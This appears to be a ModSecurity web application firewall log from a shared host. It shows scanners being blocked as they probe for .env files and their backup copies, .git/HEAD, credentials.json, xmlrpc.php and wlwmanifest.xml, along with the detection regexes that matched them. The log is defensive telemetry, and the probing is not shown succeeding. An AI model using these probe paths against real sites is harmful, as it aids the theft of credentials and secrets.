[Tue May 26 16:38:43.947313 2026] [security2:error] [pid 817651:tid 817883] [client 117.198.37.168:64725] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV_O9lGRCPPN1dS2y2akQAAAOs"]
[Tue May 26 16:38:44.697901 2026] [security2:error] [pid 817651:tid 817859] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_OdlGRCPPN1dS2y2aawAAANM"]
[Tue May 26 16:38:47.070351 2026] [security2:error] [pid 817651:tid 817781] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_PNlGRCPPN1dS2y2amwAAAIU"]
[Tue May 26 16:38:48.624149 2026] [security2:error] [pid 817651:tid 817751] [remote 74.7.241.58:42588] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahV_QNlGRCPPN1dS2y2bGgAA_2M"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes/IXR
[Tue May 26 16:38:49.078195 2026] [security2:error] [pid 817651:tid 817887] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_PtlGRCPPN1dS2y2a1gAAAO8"]
[Tue May 26 16:38:50.750894 2026] [security2:error] [pid 817651:tid 817842] [client 45.45.237.225:39998] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "dnvexpress.in"] [uri "/.git/HEAD"] [unique_id "ahV_QtlGRCPPN1dS2y2bUwAAAMI"]
[Tue May 26 16:38:50.751007 2026] [security2:error] [pid 817651:tid 817842] [client 45.45.237.225:39998] ModSecurity: Warning. Matched phrase "CCBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "dnvexpress.in"] [uri "/.git/HEAD"] [unique_id "ahV_QtlGRCPPN1dS2y2bUwAAAMI"]
[Tue May 26 16:38:50.785967 2026] [security2:error] [pid 817651:tid 817813] [client 35.199.29.40:58813] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 40.29.199.35.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thegoodsporting.com"] [uri "/xmlrpc.php"] [unique_id "ahV_QtlGRCPPN1dS2y2bQwAAAKU"]
[Tue May 26 16:38:50.892509 2026] [security2:error] [pid 817651:tid 817810] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_QNlGRCPPN1dS2y2bEwAAAKI"]
[Tue May 26 16:38:51.139391 2026] [security2:error] [pid 817651:tid 817897] [client 35.199.29.40:62083] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "thegoodsporting.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahV_Q9lGRCPPN1dS2y2bYgAAAPk"]
[Tue May 26 16:38:51.189486 2026] [security2:error] [pid 817651:tid 817874] [client 45.45.237.225:40192] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "dnvexpress.in"] [uri "/credentials.json"] [unique_id "ahV_Q9lGRCPPN1dS2y2bbwAAAOI"]
[Tue May 26 16:38:51.189565 2026] [security2:error] [pid 817651:tid 817874] [client 45.45.237.225:40192] ModSecurity: Warning. Matched phrase "CCBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "dnvexpress.in"] [uri "/credentials.json"] [unique_id "ahV_Q9lGRCPPN1dS2y2bbwAAAOI"]
[Tue May 26 16:38:51.190742 2026] [security2:error] [pid 817651:tid 817895] [client 45.45.237.225:40048] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "dnvexpress.in"] [uri "/.env"] [unique_id "ahV_Q9lGRCPPN1dS2y2bbgAAAPc"]
[Tue May 26 16:38:51.192934 2026] [security2:error] [pid 817651:tid 817802] [client 45.45.237.225:40116] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "dnvexpress.in"] [uri "/.env.bak"] [unique_id "ahV_Q9lGRCPPN1dS2y2bcwAAAJo"]
[Tue May 26 16:38:51.193276 2026] [security2:error] [pid 817651:tid 817787] [client 45.45.237.225:40120] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "dnvexpress.in"] [uri "/.env.backup"] [unique_id "ahV_Q9lGRCPPN1dS2y2bcgAAAIs"]
[Tue May 26 16:38:51.497617 2026] [security2:error] [pid 817651:tid 817860] [client 35.199.29.40:51564] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "thegoodsporting.com"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahV_Q9lGRCPPN1dS2y2bkAAAANQ"]
[Tue May 26 16:38:51.651546 2026] [security2:error] [pid 817651:tid 817893] [client 45.45.237.225:40158] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "dnvexpress.in"] [uri "/logistics.html"] [unique_id "ahV_Q9lGRCPPN1dS2y2bmwAAAPU"]
[Tue May 26 16:38:51.651749 2026] [security2:error] [pid 817651:tid 817893] [client 45.45.237.225:40158] ModSecurity: Warning. Matched phrase "CCBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "dnvexpress.in"] [uri "/logistics.html"] [unique_id "ahV_Q9lGRCPPN1dS2y2bmwAAAPU"]
[Tue May 26 16:38:51.858867 2026] [security2:error] [pid 817651:tid 817872] [client 208.84.100.18:23882] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.omshriinfrastructures.com"] [uri "/backend/.env"] [unique_id "ahV_Q9lGRCPPN1dS2y2buwAAAOA"]
[Tue May 26 16:38:51.864151 2026] [security2:error] [pid 817651:tid 817872] [client 208.84.100.18:23836] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.omshriinfrastructures.com"] [uri "/.env"] [unique_id "ahV_Q9lGRCPPN1dS2y2bxQAAAOA"]
[Tue May 26 16:38:51.864851 2026] [security2:error] [pid 817651:tid 817842] [client 208.84.100.18:23868] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.omshriinfrastructures.com"] [uri "/api/.env"] [unique_id "ahV_Q9lGRCPPN1dS2y2bxAAAAMI"]
[Tue May 26 16:38:51.866085 2026] [security2:error] [pid 817651:tid 817824] [client 208.84.100.18:23864] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.omshriinfrastructures.com"] [uri "/app/.env"] [unique_id "ahV_Q9lGRCPPN1dS2y2bxgAAALA"]
[Tue May 26 16:38:52.016338 2026] [security2:error] [pid 817651:tid 817846] [client 35.199.29.40:60834] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "thegoodsporting.com"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahV_RNlGRCPPN1dS2y2b0wAAAMY"]
[Tue May 26 16:38:52.444679 2026] [security2:error] [pid 817651:tid 817841] [client 35.199.29.40:55922] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "thegoodsporting.com"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahV_RNlGRCPPN1dS2y2b3QAAAME"]
[Tue May 26 16:38:52.789587 2026] [security2:error] [pid 817651:tid 817863] [client 35.199.29.40:62655] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "thegoodsporting.com"] [uri "/2020/wp-includes/wlwmanifest.xml"] [unique_id "ahV_RNlGRCPPN1dS2y2b4QAAANc"]
[Tue May 26 16:38:53.225319 2026] [security2:error] [pid 817651:tid 817782] [client 35.199.29.40:60100] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "thegoodsporting.com"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahV_RdlGRCPPN1dS2y2b7QAAAIY"]
[Tue May 26 16:38:53.369704 2026] [security2:error] [pid 817651:tid 817852] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_QtlGRCPPN1dS2y2bUQAAAMw"]
[Tue May 26 16:38:53.557800 2026] [security2:error] [pid 817651:tid 817853] [client 35.199.29.40:49875] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "thegoodsporting.com"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahV_RdlGRCPPN1dS2y2b9AAAAM0"]
[Tue May 26 16:38:54.051197 2026] [security2:error] [pid 817651:tid 817883] [client 208.84.100.18:23996] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "mail.omshriinfrastructures.com"] [uri "/.env.production.copy"] [unique_id "ahV_RtlGRCPPN1dS2y2cAgAAAOs"]
[Tue May 26 16:38:54.158405 2026] [security2:error] [pid 817651:tid 817830] [client 35.199.29.40:62759] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "thegoodsporting.com"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahV_RtlGRCPPN1dS2y2cCQAAALY"]
[Tue May 26 16:38:54.342286 2026] [security2:error] [pid 817651:tid 817888] [client 117.198.37.168:65029] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV_RtlGRCPPN1dS2y2cDwAAAPA"]
[Tue May 26 16:38:54.342408 2026] [security2:error] [pid 817651:tid 817888] [client 117.198.37.168:65029] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV_RtlGRCPPN1dS2y2cDwAAAPA"]
[Tue May 26 16:38:54.381032 2026] [security2:error] [pid 817651:tid 817822] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_Q9lGRCPPN1dS2y2bxwAAAK4"]
[Tue May 26 16:38:54.554044 2026] [security2:error] [pid 817651:tid 817834] [client 35.199.29.40:62555] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "thegoodsporting.com"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahV_RtlGRCPPN1dS2y2cEAAAALo"]
[Tue May 26 16:38:54.917727 2026] [security2:error] [pid 817651:tid 817827] [client 35.199.29.40:56725] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "thegoodsporting.com"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahV_RtlGRCPPN1dS2y2cGwAAALM"]
[Tue May 26 16:38:56.641408 2026] [security2:error] [pid 817651:tid 817905] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_RtlGRCPPN1dS2y2cCAAAAQE"]
[Tue May 26 16:38:58.450783 2026] [security2:error] [pid 817651:tid 817888] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_R9lGRCPPN1dS2y2cOQAAAPA"]
[Tue May 26 16:38:58.847295 2026] [security2:error] [pid 817651:tid 817842] [client 208.84.100.18:19200] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "mail.omshriinfrastructures.com"] [uri "/.env.bak"] [unique_id "ahV_StlGRCPPN1dS2y2chwAAAMI"]
[Tue May 26 16:38:58.848026 2026] [security2:error] [pid 817651:tid 817783] [client 208.84.100.18:19324] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "mail.omshriinfrastructures.com"] [uri "/.env.local.swp"] [unique_id "ahV_StlGRCPPN1dS2y2ciAAAAIc"]
[Tue May 26 16:38:58.848459 2026] [security2:error] [pid 817651:tid 817792] [client 208.84.100.18:19340] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "mail.omshriinfrastructures.com"] [uri "/.env.production.old"] [unique_id "ahV_StlGRCPPN1dS2y2chAAAAJA"]
[Tue May 26 16:38:58.848606 2026] [security2:error] [pid 817651:tid 817894] [client 208.84.100.18:19266] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "mail.omshriinfrastructures.com"] [uri "/.env.orig"] [unique_id "ahV_StlGRCPPN1dS2y2ckwAAAPY"]
[Tue May 26 16:38:58.848777 2026] [security2:error] [pid 817651:tid 817804] [client 208.84.100.18:19386] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "mail.omshriinfrastructures.com"] [uri "/.env.production.swp"] [unique_id "ahV_StlGRCPPN1dS2y2clQAAAJw"]
[Tue May 26 16:38:58.848896 2026] [security2:error] [pid 817651:tid 817873] [client 208.84.100.18:19272] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "mail.omshriinfrastructures.com"] [uri "/.env.copy"] [unique_id "ahV_StlGRCPPN1dS2y2ckgAAAOE"]
[Tue May 26 16:38:58.849349 2026] [security2:error] [pid 817651:tid 817869] [client 208.84.100.18:19336] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "mail.omshriinfrastructures.com"] [uri "/.env.local.copy"] [unique_id "ahV_StlGRCPPN1dS2y2cigAAAN0"]
[Tue May 26 16:38:58.849448 2026] [security2:error] [pid 817651:tid 817803] [client 208.84.100.18:19328] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "mail.omshriinfrastructures.com"] [uri "/.env.local.orig"] [unique_id "ahV_StlGRCPPN1dS2y2cjgAAAJs"]
[Tue May 26 16:38:58.849546 2026] [security2:error] [pid 817651:tid 817863] [client 208.84.100.18:19188] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "mail.omshriinfrastructures.com"] [uri "/.env.old"] [unique_id "ahV_StlGRCPPN1dS2y2cjAAAANc"]
[Tue May 26 16:38:58.849636 2026] [security2:error] [pid 817651:tid 817802] [client 208.84.100.18:19338] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "mail.omshriinfrastructures.com"] [uri "/.env.production.bak"] [unique_id "ahV_StlGRCPPN1dS2y2ciQAAAJo"]
[Tue May 26 16:38:58.849739 2026] [security2:error] [pid 817651:tid 817827] [client 208.84.100.18:19398] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "mail.omshriinfrastructures.com"] [uri "/.env.production.orig"] [unique_id "ahV_StlGRCPPN1dS2y2clAAAALM"]
[Tue May 26 16:38:58.849847 2026] [security2:error] [pid 817651:tid 817862] [client 208.84.100.18:19318] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "mail.omshriinfrastructures.com"] [uri "/.env.local~"] [unique_id "ahV_StlGRCPPN1dS2y2cjwAAANY"]
[Tue May 26 16:38:58.849864 2026] [security2:error] [pid 817651:tid 817828] [client 208.84.100.18:19378] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "mail.omshriinfrastructures.com"] [uri "/.env.production~"] [unique_id "ahV_StlGRCPPN1dS2y2ciwAAALQ"]
[Tue May 26 16:38:58.850405 2026] [security2:error] [pid 817651:tid 817807] [client 208.84.100.18:19308] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "mail.omshriinfrastructures.com"] [uri "/.env.local.backup"] [unique_id "ahV_StlGRCPPN1dS2y2cmAAAAJ8"]
[Tue May 26 16:38:58.850444 2026] [security2:error] [pid 817651:tid 817817] [client 208.84.100.18:19250] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "mail.omshriinfrastructures.com"] [uri "/.env.swp"] [unique_id "ahV_StlGRCPPN1dS2y2clgAAAKk"]
[Tue May 26 16:38:58.850959 2026] [security2:error] [pid 817651:tid 817892] [client 208.84.100.18:19352] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "mail.omshriinfrastructures.com"] [uri "/.env.production.backup"] [unique_id "ahV_StlGRCPPN1dS2y2chQAAAPQ"]
